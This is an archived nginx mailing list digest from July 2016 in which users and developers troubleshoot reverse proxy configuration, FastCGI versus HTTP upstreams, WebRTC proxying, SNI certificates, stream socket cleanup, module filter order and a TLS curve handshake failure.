From gnu.yair at outlook.com Sat Jul 2 06:21:38 2016 From: gnu.yair at outlook.com (=?iso-8859-1?Q?yair_avenda=F1o?=) Date: Sat, 2 Jul 2016 06:21:38 +0000 Subject: Erro 502 Bad Gateway help Message-ID: Hi I'm setting up a nginx as a reverse proxy but to try to see a site with drupal locally that have shown me 502 Bad Gateway error. this gets me in the logs. 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: " localhost" I can not get him out of there I find that causes this error. the server operating system is a gentoo. I show my vhost server { listen 80; server_name localhost; access_log /var/log/nginx/localhost_access_log main; error_log /var/log/nginx/localhost_error_log info; root /var/www/site/prueva/www/; location / { index index.html index.htm index.php; autoindex on; autoindex_exact_size off; autoindex_localtime on; } location ~ \.php$ { # Test for non-existent scripts or throw a 404 error # Without this line, nginx will blindly send any request ending in .php to php-fpm try_files $uri =404; include /etc/nginx/fastcgi.conf; fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file } } -------------- next part -------------- An HTML attachment was scrubbed... URL: From odyssey471 at gmail.com Sat Jul 2 07:04:46 2016 From: odyssey471 at gmail.com (=?UTF-8?B?5Zub5bym?=) Date: Sat, 2 Jul 2016 15:04:46 +0800 Subject: Erro 502 Bad Gateway help In-Reply-To: References: Message-ID: Hello, Where did you PHP install? You can edit /path/to/php_dir/etc/php-fpm.conf,or sometimes there will be a dir called 'www.conf.d',if it is,please change in the directory,and edit www.conf which is in the www.conf.d. You will find a option called 'listen' in the configuration file below,make sure the option's content is '127.0.0.1:8080',if not,you can edit it as '127.0.0.1:8080'.You can also edit the nginx configuration file,change the option 'fastcgi_pass'. But I recommend use socket to connect php-fastcgi,it is faster.To do this,just change the php-fpm.conf or www.conf likes follow: [www] ... user=www group=www ... listen = /dev/shm/php-cgi.sock listen.owner = www listen.group = www listen.mode = 0660 '...'just stands for something omitted. And then change the 'fastcgi_pass' option to 'unix:/dev/shm/php-cgi.sock',restart nginx and PHP,all done! P.S:My mother tongue isn't English,if there is something you couldn't understand,please let my konw,thanks! 2016-07-02 14:21 GMT+08:00 yair avenda?o : > Hi I'm setting up a nginx as a reverse proxy but to try to see a site with > drupal locally that have shown me 502 Bad Gateway error. > this gets me in the logs. > > > 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI > protocol version: 72 while reading response header from upstream, client: > 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: > "fastcgi://127.0.0.1:8080", host: " localhost" > > > > I can not get him out of there I find that causes this error. the server > operating system is a gentoo. I show my vhost > > > server { > listen 80; > server_name localhost; > > access_log /var/log/nginx/localhost_access_log main; > error_log /var/log/nginx/localhost_error_log info; > > root /var/www/site/prueva/www/; > > location / { > index index.html index.htm index.php; > autoindex on; > autoindex_exact_size off; > autoindex_localtime on; > > } > > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any > request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; > fastcgi_pass 127.0.0.1:8080; ## Make sure the > socket corresponds with PHP-FPM conf file > } > } > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Sat Jul 2 07:25:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 2 Jul 2016 08:25:19 +0100 Subject: Erro 502 Bad Gateway help In-Reply-To: References: Message-ID: <20160702072519.GG12280@daoine.org> On Sat, Jul 02, 2016 at 06:21:38AM +0000, yair avenda?o wrote: Hi there, > Hi I'm setting up a nginx as a reverse proxy but to try to see a site with drupal locally that have shown me 502 Bad Gateway error. "drupal" is possibly served by a http server, not a fastcgi server. > this gets me in the logs. > > > 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: " localhost" If you make a bad http request to a http server, it will likely return something that starts with "HTTP". The decimal value of ascii "H" is "72"; a fastcgi client may expect the first octet to refer to the fastcgi protocol version. So your error message hints that your upstream is not a fastcgi server but is a http server. Which in turn suggests that the fix is: > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; * delete those two > fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file * replace that with proxy_pass http://127.0.0.1:8080; f -- Francis Daly francis at daoine.org From medvedev.yp at gmail.com Sat Jul 2 07:59:57 2016 From: medvedev.yp at gmail.com (Yuriy Medvedev) Date: Sat, 2 Jul 2016 10:59:57 +0300 Subject: Erro 502 Bad Gateway help In-Reply-To: References: <20160702072519.GG12280@daoine.org> Message-ID: Hi. You must use fastcgi_pass if you use fastcgi server as backend e.g. php-fpm. If you use apache as backend you must use proxy_pass. 2 ???? 2016 ?. 10:25 ???????????? "Francis Daly" ???????: On Sat, Jul 02, 2016 at 06:21:38AM +0000, yair avenda?o wrote: Hi there, > Hi I'm setting up a nginx as a reverse proxy but to try to see a site with drupal locally that have shown me 502 Bad Gateway error. "drupal" is possibly served by a http server, not a fastcgi server. > this gets me in the logs. > > > 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: " localhost" If you make a bad http request to a http server, it will likely return something that starts with "HTTP". The decimal value of ascii "H" is "72"; a fastcgi client may expect the first octet to refer to the fastcgi protocol version. So your error message hints that your upstream is not a fastcgi server but is a http server. Which in turn suggests that the fix is: > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; * delete those two > fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file * replace that with proxy_pass http://127.0.0.1:8080; f -- Francis Daly francis at daoine.org _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Sat Jul 2 16:21:24 2016 From: ben+nginx at list-subs.com (Ben) Date: Sat, 2 Jul 2016 17:21:24 +0100 Subject: WebRTC and NGINX Reverse Proxy Message-ID: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> Hi, I have a PBX that has a webRTC feature (i.e. you login to PBX website and you have a virtual handset with all the features). Is it feasible or possible to use NGINX as a reverse proxy to handle webRTC ? A basic NGINX config just using proxy_pass doesn't seem to work, so I'm guessing there's probably more to it than that ? THanks ! From unixro at gmail.com Mon Jul 4 08:27:31 2016 From: unixro at gmail.com (Mihai Vintila) Date: Mon, 4 Jul 2016 11:27:31 +0300 Subject: WebRTC and NGINX Reverse Proxy In-Reply-To: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> References: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> Message-ID: It works with something like this: location ^~ /webrtc/ { if ($my_https = "off") { return 301 https://$host$request_uri; } limit_conn conn 100; limit_req zone=basic burst=3000 nodelay; proxy_pass http://backend; proxy_set_header X-Real-IP $remote_addr; proxy_read_timeout 600s; proxy_send_timeout 600s; proxy_connect_timeout 20s; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection upgrade; proxy_set_header Host $host; } Best regards, Vintila Mihai Alexandru On 7/2/2016 7:21 PM, Ben wrote: > Hi, > > I have a PBX that has a webRTC feature (i.e. you login to PBX website > and you have a virtual handset with all the features). > > Is it feasible or possible to use NGINX as a reverse proxy to handle > webRTC ? > > A basic NGINX config just using proxy_pass doesn't seem to work, so > I'm guessing there's probably more to it than that ? > > THanks ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Mon Jul 4 10:31:02 2016 From: nginx-forum at forum.nginx.org (Sushma) Date: Mon, 04 Jul 2016 06:31:02 -0400 Subject: SNI support for nginx Message-ID: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Hi, I am relatively new to nginx. I would like to setup multiple domains on the same port. Nginx has SNI support enabled. Do i have to still point to the right ssl certificate and ssl private in each of server blocks using the ssl_certificate directive? Or is there a way, nginx will be able to dynamically figure out the cert to be presented without it being explicitly mentioned via the directive ssl_certificate? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268024,268024#msg-268024 From mdounin at mdounin.ru Mon Jul 4 11:18:57 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 4 Jul 2016 14:18:57 +0300 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160704111857.GP30781@mdounin.ru> Hello! On Mon, Jul 04, 2016 at 06:31:02AM -0400, Sushma wrote: > I am relatively new to nginx. > I would like to setup multiple domains on the same port. Nginx has SNI > support enabled. > Do i have to still point to the right ssl certificate and ssl private in > each of server blocks using the ssl_certificate directive? Yes. > Or is there a way, nginx will be able to dynamically figure out the cert to > be presented without it being explicitly mentioned via the directive > ssl_certificate? No. -- Maxim Dounin http://nginx.org/ From pratyush at hostindya.com Mon Jul 4 10:41:30 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Mon, 04 Jul 2016 16:11:30 +0530 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1e9246e8-7b66-4a7a-b32c-e7b434bb2109@email.android.com> An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Mon Jul 4 11:28:58 2016 From: ben+nginx at list-subs.com (Ben) Date: Mon, 4 Jul 2016 12:28:58 +0100 Subject: WebRTC and NGINX Reverse Proxy In-Reply-To: References: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> Message-ID: <0352927a-7cbc-484e-38d0-f41abd13dac7@list-subs.com> Sounds fabulous. Thank Vintila ! On 04/07/2016 09:27, Mihai Vintila wrote: > It works with something like this: > > > location ^~ /webrtc/ { > if ($my_https = "off") { > return 301 https://$host$request_uri; > } > limit_conn conn 100; > limit_req zone=basic burst=3000 nodelay; > proxy_pass http://backend; > proxy_set_header X-Real-IP $remote_addr; > proxy_read_timeout 600s; > proxy_send_timeout 600s; > proxy_connect_timeout 20s; > proxy_http_version 1.1; > proxy_set_header Upgrade $http_upgrade; > proxy_set_header Connection upgrade; > proxy_set_header Host $host; > } > > Best regards, > Vintila Mihai Alexandru > > On 7/2/2016 7:21 PM, Ben wrote: >> Hi, >> >> I have a PBX that has a webRTC feature (i.e. you login to PBX website >> and you have a virtual handset with all the features). >> >> Is it feasible or possible to use NGINX as a reverse proxy to handle >> webRTC ? >> >> A basic NGINX config just using proxy_pass doesn't seem to work, so >> I'm guessing there's probably more to it than that ? >> >> THanks ! >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From anoopalias01 at gmail.com Mon Jul 4 13:35:49 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Mon, 4 Jul 2016 19:05:49 +0530 Subject: nginx not removing stream socket Message-ID: Hi, On CentOS7 . nginx is not removing the stream socket on shutdown causing restarts to fail unless the socket file is manually removed. nginx process itself exit .But becase of the file not being removed nginx is unable to bind to the socket file on next start systemd unit file ####################### [Service] Type=forking PIDFile=/var/run/nginx.pid ExecStartPre=/usr/sbin/nginx -t -c /etc/nginx/nginx.conf ExecStart=/usr/sbin/nginx -c /etc/nginx/nginx.conf ExecReload=/bin/kill -s HUP $MAINPID ExecStop=/bin/kill -s QUIT $MAINPID PrivateTmp=true [Install] WantedBy=multi-user.target ########################### #nginx configuration stream { upstream mysql_backend { server unix:/var/lib/mysql/mysql_original.sock; server x.x.x.x:13306 backup; } server { listen 127.0.0.1:3306; listen unix:/var/lib/mysql/mysql.sock; proxy_pass mysql_backend; } } ###################################### The same setting is working fine on a centos6 server with init . which use the killproc function from /etc/rc.d/init.d/functions Even on CentOS6 ..if I do kill -QUIT the binary exits without removing the socket. What am I doing wrong?. What is the correct signal to terminate the process and remove the sockets bound. Thanks, -- Anoop P Alias From anoopalias01 at gmail.com Mon Jul 4 13:53:01 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Mon, 4 Jul 2016 19:23:01 +0530 Subject: nginx not removing stream socket In-Reply-To: References: Message-ID: ok just found this - https://trac.nginx.org/nginx/ticket/753 So shall i use SIGTERM instead of SIGQUIT in the systemd unit file? On Mon, Jul 4, 2016 at 7:05 PM, Anoop Alias wrote: > Hi, > > On CentOS7 . nginx is not removing the stream socket on shutdown > causing restarts to fail unless the socket file is manually removed. > nginx process itself exit .But becase of the file not being removed > nginx is unable to bind to the socket file on next start > > systemd unit file > ####################### > > [Service] > Type=forking > PIDFile=/var/run/nginx.pid > ExecStartPre=/usr/sbin/nginx -t -c /etc/nginx/nginx.conf > ExecStart=/usr/sbin/nginx -c /etc/nginx/nginx.conf > ExecReload=/bin/kill -s HUP $MAINPID > ExecStop=/bin/kill -s QUIT $MAINPID > PrivateTmp=true > > [Install] > WantedBy=multi-user.target > ########################### > > #nginx configuration > > stream { > upstream mysql_backend { > server unix:/var/lib/mysql/mysql_original.sock; > server x.x.x.x:13306 backup; > } > > server { > listen 127.0.0.1:3306; > listen unix:/var/lib/mysql/mysql.sock; > proxy_pass mysql_backend; > } > } > ###################################### > > The same setting is working fine on a centos6 server with init . > > which use the killproc function from /etc/rc.d/init.d/functions > > Even on CentOS6 ..if I do > > kill -QUIT > > the binary exits without removing the socket. > > What am I doing wrong?. > > What is the correct signal to terminate the process and remove the > sockets bound. > > Thanks, > -- > Anoop P Alias -- Anoop P Alias From nginx-forum at forum.nginx.org Mon Jul 4 17:28:45 2016 From: nginx-forum at forum.nginx.org (st.gabrielli) Date: Mon, 04 Jul 2016 13:28:45 -0400 Subject: Issue with KeepAlive Message-ID: <706ac92ca7a8ac480d792062e8329ef8.NginxMailingListEnglish@forum.nginx.org> Hi all, I need help on managing KeepAlive on my nginx webservice. Seeing error logs seems that many keepalive HTTP request are discarded by Nginx. On client side this behaviour seems to be a timeout. This is my code: if(strlen(session->response) > 0) { b->pos = (u_char *)session->response; b->last = (u_char *)session->response + strlen(session->response); r->headers_out.content_type_len = strlen("application/json") - 1; r->headers_out.content_type.data = (u_char *) "application/json"; r->headers_out.status = NGX_HTTP_OK; } else { b->pos = (u_char *)r->args.data; b->last = (u_char *)r->args.data + r->args.len; r->headers_out.status = NGX_HTTP_NO_CONTENT; } r->headers_out.content_length_n = strlen(session->response); b->memory = 1; b->last_buf = 1; ftime(&end); felapsed=(int) (1000.0 * (end.time - start.time) + (end.millitm - start.millitm)); ngx_http_send_header(r); ngx_http_output_filter(r, &out); ngx_http_finalize_request(r, r->headers_out.status); Sometimes i Send a 200 Ok and some other times 204. On nginx error log I see: 2016/07/04 11:06:11 [debug] 11643#11643: *13 http finalize request: 204, "/mopub_bidr?" a:1, c:2 2016/07/04 11:06:11 [debug] 11643#11643: *13 http terminate request count:2 2016/07/04 11:06:11 [debug] 11643#11643: *13 http terminate cleanup count:2 blk:0 2016/07/04 11:06:11 [debug] 11643#11643: *13 http finalize request: -4, "/mopub_bidr?" a:1, c:2 2016/07/04 11:06:11 [debug] 11643#11643: *13 http request count:2 blk:0 2016/07/04 11:06:11 [debug] 11643#11643: *13 http posted request: "/mopub_bidr?" Someone can me explain what means "finalize request: -4" ? It's an error? Sometime into error log I found this error: recv() not ready and this seems the cause of client timeouts. how can I resolve it on nginx conf? Thanks a lot for help Stefano G. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268052,268052#msg-268052 From gopal.raghavan at here.com Tue Jul 5 04:06:29 2016 From: gopal.raghavan at here.com (Raghavan, Gopal) Date: Tue, 5 Jul 2016 04:06:29 +0000 Subject: Order of execution of nginx filters In-Reply-To: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> Message-ID: <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> Hi, I have the following three directives: location = /hello { hello_world; hola_mundo on; bonjour_monde on; } hello_world is an nginx handler module that provides content ?hello world? hola_mundo and bonjour_monde are filters that add to the chain strings ?hola mundo? and ?bonjour monde? respectively. Here is the output: curl "http://localhost:8090/hello" hello worldhola mundobonjour monde Switching the filter directives in location block has no impact on output string. For eg: location = /hello { hello_world; bonjour_monde on; hola_mundo on; } Here is the output: curl "http://localhost:8090/hello" hello worldhola mundobonjour monde How do I control the order of execution of filters? I already looked at objs/ngx_modules.c and auto/modules. My custom handlers and filters are not listed there. One thing that I observed is that the order of listing the load_module modules/*.so in conf/nginx.conf does impact the order of execution of the filters. Is there any other trick to adjust the execution order within the location block? Thanks, -- Gopal -------------- next part -------------- An HTML attachment was scrubbed... URL: From florian at bottledsoftware.de Tue Jul 5 12:00:04 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Tue, 5 Jul 2016 14:00:04 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work Message-ID: Hi all, I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config. First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue. The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won?t connect. This is what curl outputs: curl -vvvv -k "https://localhost" * Rebuilt URL to: https://localhost/ * Trying ::1... * connect to ::1 port 443 failed: Connection refused * Trying 127.0.0.1... * Connected to localhost (127.0.0.1) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH * successfully set certificate verify locations: * CAfile: /usr/local/etc/openssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS header, Certificate Status (22): * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS header, Unknown (21): * TLSv1.2 (IN), TLS alert, Server hello (2): * error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure * Closing connection 0 curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine. To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. Do you have an idea what?s going on here? Please let me know if you need any additional information. Thanks! Florian From mdounin at mdounin.ru Tue Jul 5 13:20:26 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 16:20:26 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: Message-ID: <20160705132026.GH30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 02:00:04PM +0200, Florian Reinhart wrote: > Hi all, > > I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g > > While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config. > > First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue. > > The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won?t connect. This is what curl outputs: > > curl -vvvv -k "https://localhost" > * Rebuilt URL to: https://localhost/ > * Trying ::1... > * connect to ::1 port 443 failed: Connection refused > * Trying 127.0.0.1... > * Connected to localhost (127.0.0.1) port 443 (#0) > * ALPN, offering h2 > * ALPN, offering http/1.1 > * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH > * successfully set certificate verify locations: > * CAfile: /usr/local/etc/openssl/cert.pem > CApath: none > * TLSv1.2 (OUT), TLS header, Certificate Status (22): > * TLSv1.2 (OUT), TLS handshake, Client hello (1): > * TLSv1.2 (IN), TLS header, Unknown (21): > * TLSv1.2 (IN), TLS alert, Server hello (2): > * error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure > * Closing connection 0 > curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure > > > When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine. > > To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. > > Do you have an idea what?s going on here? Please let me know if you need any additional information. It looks like the client doesn't support the curve you've configured, and non-ECDH ciphers are disabled. -- Maxim Dounin http://nginx.org/ From florian at bottledsoftware.de Tue Jul 5 14:02:21 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Tue, 5 Jul 2016 16:02:21 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705132026.GH30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> Message-ID: <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> Hi Maxim! That?s what I thought. However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, I tested the following clients on OS X 10.11.5, all failed to connect: curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 Safari 9.1.1 (11601.6.17) Chrome 51.0.2704.106 Firefox 47.0.1 That?s why I don?t think it is a client issue. Best, Florian > On 05 Jul 2016, at 15:20, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 02:00:04PM +0200, Florian Reinhart wrote: > >> Hi all, >> >> I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g >> >> While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config. >> >> First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue. >> >> The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won?t connect. This is what curl outputs: >> >> curl -vvvv -k "https://localhost" >> * Rebuilt URL to: https://localhost/ >> * Trying ::1... >> * connect to ::1 port 443 failed: Connection refused >> * Trying 127.0.0.1... >> * Connected to localhost (127.0.0.1) port 443 (#0) >> * ALPN, offering h2 >> * ALPN, offering http/1.1 >> * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH >> * successfully set certificate verify locations: >> * CAfile: /usr/local/etc/openssl/cert.pem >> CApath: none >> * TLSv1.2 (OUT), TLS header, Certificate Status (22): >> * TLSv1.2 (OUT), TLS handshake, Client hello (1): >> * TLSv1.2 (IN), TLS header, Unknown (21): >> * TLSv1.2 (IN), TLS alert, Server hello (2): >> * error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure >> * Closing connection 0 >> curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure >> >> >> When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine. >> >> To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. >> >> Do you have an idea what?s going on here? Please let me know if you need any additional information. > > It looks like the client doesn't support the curve you've > configured, and non-ECDH ciphers are disabled. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From bpugh at cscontract.com Tue Jul 5 14:26:22 2016 From: bpugh at cscontract.com (Brian Pugh) Date: Tue, 5 Jul 2016 14:26:22 +0000 Subject: does nginx forward requests to backend servers using http or https? Message-ID: <1467728782092.71066@cscontract.com> I am using the free version of nginx on RHEL 6.7. The version is : nginx-1.10.1-1.el6.ngx.x86_64 When using nginx as a load balancer I would like to know if nginx forwards requests to backend servers using http or https?? -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 14:33:49 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 09:33:49 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: <1467728782092.71066@cscontract.com> References: <1467728782092.71066@cscontract.com> Message-ID: You define what you want it sent to the backend as. So if you use http://backendserver it's http, if https://backendserver:443 - https. On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: > I am using the free version of nginx on RHEL 6.7. The version is : > > > nginx-1.10.1-1.el6.ngx.x86_64 > > > When using nginx as a load balancer I would like to know if nginx forwards > requests to backend servers using http or https?? > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 14:39:48 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 17:39:48 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> Message-ID: <20160705143948.GJ30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 04:02:21PM +0200, Florian Reinhart wrote: > Hi Maxim! > > That?s what I thought. However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, > > I tested the following clients on OS X 10.11.5, all failed to connect: > > curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 > Safari 9.1.1 (11601.6.17) > Chrome 51.0.2704.106 > Firefox 47.0.1 > > That?s why I don?t think it is a client issue. Yes, at least browsers are expected to support secp384r1, so it's probably something different. Which certificate do you use? Is it the same as on the old server? Such a situation can easily happen if the only certificate available is ECDSA one and uses, e.g., prime256v1 (not secp384r1), but only secp384r1 is enabled by the configuration. Looking into nginx error logs might also somewhat help to diagnose what goes on here. -- Maxim Dounin http://nginx.org/ From bpugh at cscontract.com Tue Jul 5 14:41:42 2016 From: bpugh at cscontract.com (Brian Pugh) Date: Tue, 5 Jul 2016 14:41:42 +0000 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com>, Message-ID: <1467729702919.45075@cscontract.com> Are you referring to the proxy pass declaration? If so I get an error when I uncomment that line out saying "nginx: [emerg] "proxy_pass" directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" ________________________________ From: nginx on behalf of Drew Turner Sent: Tuesday, July 5, 2016 9:33 AM To: nginx at nginx.org Subject: Re: does nginx forward requests to backend servers using http or https? You define what you want it sent to the backend as. So if you use http://backendserver it's http, if https://backendserver:443 - https. On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh > wrote: I am using the free version of nginx on RHEL 6.7. The version is : nginx-1.10.1-1.el6.ngx.x86_64 When using nginx as a load balancer I would like to know if nginx forwards requests to backend servers using http or https?? _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 14:47:28 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 09:47:28 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: <1467729702919.45075@cscontract.com> References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: Yes that is in proxy_pass. Are you sure proxy_pass is defined in the server stanza and that it's inside an include stanza? Posting the code would be helpful if you can redact the sensitive information. On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: > Are you referring to the proxy pass declaration? If so I get an error when > I uncomment that line out saying "nginx: [emerg] "proxy_pass" directive is > not allowed here in /etc/nginx/conf.d/default.conf:40?" > > > > > ------------------------------ > *From:* nginx on behalf of Drew Turner < > drew at drewnturner.com> > *Sent:* Tuesday, July 5, 2016 9:33 AM > *To:* nginx at nginx.org > *Subject:* Re: does nginx forward requests to backend servers using http > or https? > > You define what you want it sent to the backend as. So if you use > http://backendserver it's http, if https://backendserver:443 - https. > > On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: > >> I am using the free version of nginx on RHEL 6.7. The version is : >> >> >> nginx-1.10.1-1.el6.ngx.x86_64 >> >> >> When using nginx as a load balancer I would like to know if nginx >> forwards requests to backend servers using http or https?? >> >> >> >> >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at 